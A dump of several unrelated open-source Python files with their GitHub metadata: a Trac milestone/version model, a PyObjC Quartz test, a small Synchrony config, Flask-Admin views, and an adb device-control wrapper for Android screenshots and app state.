listener.milestone_created(self)
def update(self, db=None):
"""Update the milestone.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
self.name = simplify_whitespace(self.name)
if not self.name:
raise TracError(_("Invalid milestone name."))
with self.env.db_transaction as db:
old_name = self._old['name']
self.env.log.info("Updating milestone '%s'", self.name)
db("""UPDATE milestone
SET name=%s, due=%s, completed=%s, description=%s
WHERE name=%s
""", (self.name, to_utimestamp(self.due),
to_utimestamp(self.completed),
self.description, old_name))
if self.name != old_name:
# Update milestone field in tickets
self.env.log.info("Updating milestone field of all tickets "
"associated with milestone '%s'", self.name)
db("UPDATE ticket SET milestone=%s WHERE milestone=%s",
(self.name, old_name))
TicketSystem(self.env).reset_ticket_fields()
# Reparent attachments
Attachment.reparent_all(self.env, 'milestone', old_name,
'milestone', self.name)
old_values = dict((k, v) for k, v in self._old.iteritems()
if getattr(self, k) != v)
self._to_old()
for listener in TicketSystem(self.env).milestone_change_listeners:
listener.milestone_changed(self, old_values)
@classmethod
def select(cls, env, include_completed=True, db=None):
"""
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
sql = "SELECT name, due, completed, description FROM milestone "
if not include_completed:
sql += "WHERE COALESCE(completed, 0)=0 "
milestones = []
for row in env.db_query(sql):
milestone = Milestone(env)
milestone._from_database(row)
milestones.append(milestone)
def milestone_order(m):
return (m.completed or utcmax,
m.due or utcmax,
embedded_numbers(m.name))
return sorted(milestones, key=milestone_order)
def group_milestones(milestones, include_completed):
"""Group milestones into "open with due date", "open with no due date",
and possibly "completed". Return a list of (label, milestones) tuples."""
def category(m):
return 1 if m.is_completed else 2 if m.due else 3
open_due_milestones, open_not_due_milestones, \
closed_milestones = partition([(m, category(m))
for m in milestones], (2, 3, 1))
groups = [
(_('Open (by due date)'), open_due_milestones),
(_('Open (no due date)'), open_not_due_milestones),
]
if include_completed:
groups.append((_('Closed'), closed_milestones))
return groups
class Version(object):
def __init__(self, env, name=None, db=None):
self.env = env
self.name = self._old_name = self.time = self.description = None
if name:
for time, description in self.env.db_query("""
SELECT time, description FROM version WHERE name=%s
""", (name,)):
self.name = self._old_name = name
self.time = from_utimestamp(time) if time else None
self.description = description or ''
break
else:
raise ResourceNotFound(_("Version %(name)s does not exist.",
name=name))
exists = property(lambda self: self._old_name is not None)
def delete(self, db=None):
"""Delete the version.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert self.exists, "Cannot delete non-existent version"
with self.env.db_transaction as db:
self.env.log.info("Deleting version %s", self.name)
db("DELETE FROM version WHERE name=%s", (self.name,))
self.name = self._old_name = None
TicketSystem(self.env).reset_ticket_fields()
def insert(self, db=None):
"""Insert a new version.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert not self.exists, "Cannot insert existing version"
self.name = simplify_whitespace(self.name)
if not self.name:
raise TracError(_("Invalid version name."))
with self.env.db_transaction as db:
self.env.log.debug("Creating new version '%s'", self.name)
db("INSERT INTO version (name,time,description) VALUES (%s,%s,%s)",
(self.name, to_utimestamp(self.time), self.description))
self._old_name = self.name
TicketSystem(self.env).reset_ticket_fields()
def update(self, db=None):
"""Update the version.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert self.exists, "Cannot update non-existent version"
self.name = simplify_whitespace(self.name)
if not self.name:
raise TracError(_("Invalid version name."))
with self.env.db_transaction as db:
self.env.log.info("Updating version '%s'", self.name)
db("""UPDATE version
SET name=%s, time=%s, description=%s WHERE name=%s
""", (self.name, to_utimestamp(self.time), self.description,
self._old_name))
if self.name != self._old_name:
# Update tickets
db("UPDATE ticket SET version=%s WHERE version=%s",
(self.name, self._old_name))
self._old_name = self.name
TicketSystem(self.env).reset_ticket_fields()
@classmethod
def select(cls, env, db=None):
"""
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
versions = []
for name, time, description in env.db_query("""
SELECT name, time, description FROM version"""):
version = cls(env)
version.name = version._old_name = name
version.time = from_utimestamp(time) if time else None
version.description = description or ''
versions.append(version)
def version_order(v):
return (v.time or utcmax, embedded_numbers(v.name))
return sorted(versions, key=version_order, reverse=True)
|
{
"content_hash": "355ee3eb9184a3d52fa493fee1c2ff56",
"timestamp": "",
"source": "github",
"line_count": 1149,
"max_line_length": 88,
"avg_line_length": 41.40644038294169,
"alnum_prop": 0.5018076341012275,
"repo_name": "i-rabot/tractogithub",
"id": "f53a8bd7b69725dc74c9936d21960110cb6a2a1e",
"size": "48358",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tracformatter/trac/ticket/model.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "72236"
},
{
"name": "HTML",
"bytes": "293190"
},
{
"name": "JavaScript",
"bytes": "82208"
},
{
"name": "Python",
"bytes": "2018196"
}
],
"symlink_target": ""
}
|
from PyObjCTools.TestSupport import *
from Quartz.QuartzCore import *
from Quartz import *
class TestCIPluginInterfaceHelper (NSObject):
def load_(self, h): return 1
class TestCIPlugInInterface (TestCase):
def testMethods(self):
self.assertResultIsBOOL(TestCIPluginInterfaceHelper.load_)
def no_testProtocol(self):
p = objc.protocolNamed('CIPlugInRegistration')
self.assertIsInstancE(p, objc.formal_protocol)
if __name__ == "__main__":
main()
|
{
"content_hash": "3cb58686be34ae33953cbd776aeabd91",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 66,
"avg_line_length": 28.647058823529413,
"alnum_prop": 0.7186858316221766,
"repo_name": "albertz/music-player",
"id": "57b7f028aeb99a5488956233434c2db61ebc11b6",
"size": "488",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mac/pyobjc-framework-Quartz/PyObjCTest/test_ciplugininterface.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Assembly",
"bytes": "47481"
},
{
"name": "C",
"bytes": "435926"
},
{
"name": "C++",
"bytes": "149133"
},
{
"name": "CSS",
"bytes": "16435"
},
{
"name": "HTML",
"bytes": "914432"
},
{
"name": "JavaScript",
"bytes": "52869"
},
{
"name": "M",
"bytes": "10808"
},
{
"name": "Makefile",
"bytes": "13304"
},
{
"name": "Mathematica",
"bytes": "61418"
},
{
"name": "Objective-C",
"bytes": "2082720"
},
{
"name": "Objective-C++",
"bytes": "62427"
},
{
"name": "PostScript",
"bytes": "2783"
},
{
"name": "Prolog",
"bytes": "217"
},
{
"name": "Python",
"bytes": "7789845"
},
{
"name": "QMake",
"bytes": "9667"
},
{
"name": "Roff",
"bytes": "8329"
},
{
"name": "Shell",
"bytes": "3521"
}
],
"symlink_target": ""
}
|
import os
if 'SYNCHRONY_DATABASE' in os.environ:
SQLALCHEMY_DATABASE_URI = os.environ['SYNCHRONY_DATABASE']
else:
SQLALCHEMY_DATABASE_URI = "sqlite:///cache.db"
# Let users without accounts reap the benefits of decentralised web pages:
OPEN_PROXY = True
# If you haven't got an internet connection change this to 0.01
# to reduce the time taken before the system decides to check
# peers and the database:
HTTP_TIMEOUT = 1.00
# Allow people to register accounts on the login screen
PERMIT_NEW_ACCOUNTS = True
# Zero peer trust ratings instead of decrementing them
NO_PRISONERS = False
# Remove <script> nodes at the parser.
DISABLE_JAVASCRIPT = True
|
{
"content_hash": "e0d551432c1ebc498704d844a5bfef13",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 74,
"avg_line_length": 28.608695652173914,
"alnum_prop": 0.7659574468085106,
"repo_name": "Psybernetics/Synchrony",
"id": "cced50dd1edc34cccb3635109b91ba7bfdb479b4",
"size": "658",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "synchrony/config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "159718"
},
{
"name": "HTML",
"bytes": "3106"
},
{
"name": "JavaScript",
"bytes": "814227"
},
{
"name": "Python",
"bytes": "287504"
}
],
"symlink_target": ""
}
|
from flask_admin.contrib.sqla import ModelView
class AdminUserView(ModelView):
"""Vista que permite realizar operaciones CRUD sobre el modelo User"""
column_list = ("name", "email", "skills", "roles")
class AdminRoleView(ModelView):
"""Vista que permite realizar operaciones CRUD sobre el modelo Role"""
column_list = ("name", "description")
class AdminSkillView(ModelView):
column_list = ("name", "description")
|
{
"content_hash": "f61e3259ab400ed4ee5f5d85a4d0cab3",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 74,
"avg_line_length": 22.2,
"alnum_prop": 0.7027027027027027,
"repo_name": "AthelasPeru/laborapp",
"id": "d7e6e523bcac4691ed8f0d4a38b4c7b10ad3342d",
"size": "444",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/blueprints/admin/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "346803"
},
{
"name": "HTML",
"bytes": "25611"
},
{
"name": "JavaScript",
"bytes": "101056"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "17308"
},
{
"name": "Ruby",
"bytes": "976"
},
{
"name": "Shell",
"bytes": "260"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
import atexit
import os
import re
import json
import collections
import tempfile
from StringIO import StringIO
from PIL import Image
from atx import logutils
logger = logutils.getLogger(__name__)
_DISPLAY_RE = re.compile(
r'.*DisplayViewport{valid=true, .*orientation=(?P<orientation>\d+), .*deviceWidth=(?P<width>\d+), deviceHeight=(?P<height>\d+).*')
_PROP_PATTERN = re.compile(r'\[(?P<key>.*?)\]:\s*\[(?P<value>.*)\]')
class Device(object):
Display = collections.namedtuple('Display', ['width', 'height', 'rotation'])
Package = collections.namedtuple('Package', ['name', 'path'])
__minicap = '/data/local/tmp/minicap'
def __init__(self, client, serial):
''' TODO: client change to host, port '''
self._client = client
self._serial = serial
self._screenshot_method = 'minicap'
@property
def serial(self):
return self._serial
def raw_cmd(self, *args, **kwargs):
args = ['-s', self._serial] + list(args)
return self._client.raw_cmd(*args)
def run_cmd(self, *args):
"""
Unix style output, already replace \r\n to \n
"""
p = self.raw_cmd(*args)
return p.communicate()[0].replace('\r\n', '\n')
def shell(self, *args):
"""
Run command `adb shell`
"""
args = ['shell'] + list(args)
return self.run_cmd(*args)
def keyevent(self, key):
''' Call: adb shell input keyevent $key '''
self.shell('input', 'keyevent', key)
def remove(self, filename):
"""
Remove file from device
"""
output = self.shell('rm', filename)
# any output means rm failed.
return False if output else True
def install(self, filename):
"""
TOOD(ssx): Install apk into device, show progress
Args:
- filename(string): apk file path
"""
return self.run_cmd('install', '-rt', filename)
def uninstall(self, package_name, keep_data=False):
"""
Uninstall package
Args:
- package_name(string): package name ex: com.example.demo
- keep_data(bool): keep the data and cache directories
"""
if keep_data:
return self.run_cmd('uninstall', '-k', package_name)
else:
return self.run_cmd('uninstall', package_name)
def pull(self, source_file, target_file=None):
if target_file is None:
raise RuntimeError('Not supported now')
self.run_cmd('pull', source_file, target_file)
@property
def display(self):
'''
Return device width, height, rotation
'''
w, h = (0, 0)
for line in self.shell('dumpsys', 'display').splitlines():
m = _DISPLAY_RE.search(line, 0)
if not m:
continue
w = int(m.group('width'))
h = int(m.group('height'))
o = int(m.group('orientation'))
w, h = min(w, h), max(w, h)
return self.Display(w, h, o)
output = self.shell('LD_LIBRARY_PATH=/data/local/tmp', self.__minicap, '-i')
try:
data = json.loads(output)
(w, h, o) = (data['width'], data['height'], data['rotation']/90)
return self.Display(w, h, o)
except ValueError:
pass
def rotation(self):
"""
Android rotation
Return:
- int [0-4]
"""
return self.display.rotation
def properties(self):
'''
Android Properties, extracted from `adb shell getprop`
Returns:
dict of props, for
example:
{'ro.bluetooth.dun': 'true'}
'''
props = {}
for line in self.shell(['getprop']).splitlines():
m = _PROP_PATTERN.match(line)
if m:
props[m.group('key')] = m.group('value')
return props
def packages(self):
"""
Show all packages
"""
pattern = re.compile(r'package:(/[^=]+\.apk)=([^\s]+)')
packages = []
for line in self.shell('pm', 'list', 'packages', '-f').splitlines():
m = pattern.match(line)
if not m:
continue
path, name = m.group(1), m.group(2)
packages.append(self.Package(name, path))
return packages
def _adb_screencap(self, scale=1.0):
"""
capture screen with adb shell screencap
"""
remote_file = tempfile.mktemp(dir='/data/local/tmp/', prefix='screencap-', suffix='.png')
local_file = tempfile.mktemp(prefix='atx-screencap-', suffix='.png')
self.shell('screencap', '-p', remote_file)
try:
self.pull(remote_file, local_file)
image = Image.open(local_file)
image.load() # because Image is a lazy load function
if scale is not None and scale != 1.0:
image = image.resize([int(scale * s) for s in image.size], Image.BICUBIC)
rotation = self.rotation()
if rotation:
method = getattr(Image, 'ROTATE_{}'.format(rotation*90))
image = image.transpose(method)
return image
finally:
self.remove(remote_file)
os.unlink(local_file)
def _adb_minicap(self, scale=1.0):
"""
capture screen with minicap
https://github.com/openstf/minicap
"""
remote_file = tempfile.mktemp(dir='/data/local/tmp/', prefix='minicap-', suffix='.jpg')
local_file = tempfile.mktemp(prefix='atx-minicap-', suffix='.jpg')
(w, h, r) = self.display
params = '{x}x{y}@{rx}x{ry}/{r}'.format(x=w, y=h, rx=int(w*scale), ry=int(h*scale), r=r*90)
try:
self.shell('LD_LIBRARY_PATH=/data/local/tmp', self.__minicap, '-s', '-P', params, '>', remote_file)
self.pull(remote_file, local_file)
with open(local_file, 'rb') as f:
image = Image.open(StringIO(f.read()))
return image
finally:
self.remove(remote_file)
os.unlink(local_file)
def screenshot(self, filename=None, scale=1.0, method=None):
"""
Take device screenshot
Args:
- filename(string): optional, save int filename
- scale(float): scale size
- method(string): one of minicap,screencap
Return:
PIL.Image
"""
image = None
method = method or self._screenshot_method
if method == 'minicap':
try:
image = self._adb_minicap(scale)
except Exception as e:
logger.warn("use minicap failed, fallback to screencap. error detail: %s", e)
self._screenshot_method = 'screencap'
return self.screenshot(filename=filename, scale=scale)
elif method == 'screencap':
image = self._adb_screencap(scale)
else:
raise RuntimeError("No such method(%s)" % method)
if filename:
image.save(filename)
return image
def click(self, x, y):
'''
same as adb -s ${SERIALNO} shell input tap x y
FIXME(ssx): not tested on horizontal screen
'''
self.shell('input', 'tap', str(x), str(y))
def forward(self, local_port, remote_port):
'''
adb port forward. return local_port
TODO: not tested
'''
return self._client.forward(self.serial, local_port, remote_port)
def is_locked(self):
"""
Returns:
- lock state(bool)
Raises:
RuntimeError
"""
_lockScreenRE = re.compile('mShowingLockscreen=(true|false)')
m = _lockScreenRE.search(self.shell('dumpsys', 'window', 'policy'))
if m:
return (m.group(1) == 'true')
raise RuntimeError("Couldn't determine screen lock state")
def is_screen_on(self):
'''
Checks if the screen is ON.
Returns:
True if the device screen is ON
Raises:
RuntimeError
'''
_screenOnRE = re.compile('mScreenOnFully=(true|false)')
m = _screenOnRE.search(self.shell('dumpsys', 'window', 'policy'))
if m:
return (m.group(1) == 'true')
raise RuntimeError("Couldn't determine screen ON state")
def wake(self):
"""
Wake up device if device locked
"""
if not self.is_screen_on():
self.keyevent('POWER')
def is_keyboard_shown(self):
dim = self.shell('dumpsys', 'input_method')
if dim:
# FIXME: API >= 15 ?
return "mInputShown=true" in dim
return False
def current_app(self):
"""
Return: (package_name, activity)
Raises:
RuntimeError
"""
_focusedRE = re.compile('mFocusedApp=.*ActivityRecord{\w+ \w+ (?P<package>.*)/(?P<activity>.*) .*')
m = _focusedRE.search(self.shell('dumpsys', 'window', 'windows'))
if m:
return m.group('package'), m.group('activity')
raise RuntimeError("Couldn't get focused app")
|
{
"content_hash": "e22ac85b4ebe0b788105a0776ab76609",
"timestamp": "",
"source": "github",
"line_count": 294,
"max_line_length": 134,
"avg_line_length": 31.700680272108844,
"alnum_prop": 0.5335836909871244,
"repo_name": "Andy-hpliu/AirtestX",
"id": "dc36ce7b2b447dbb443e79e479456a914c75a96d",
"size": "9367",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "atx/adbkit/device.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "230"
},
{
"name": "CSS",
"bytes": "34684"
},
{
"name": "Go",
"bytes": "13043"
},
{
"name": "HTML",
"bytes": "28019"
},
{
"name": "JavaScript",
"bytes": "300119"
},
{
"name": "Makefile",
"bytes": "348"
},
{
"name": "Protocol Buffer",
"bytes": "5495"
},
{
"name": "Python",
"bytes": "394333"
},
{
"name": "Shell",
"bytes": "4162"
}
],
"symlink_target": ""
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.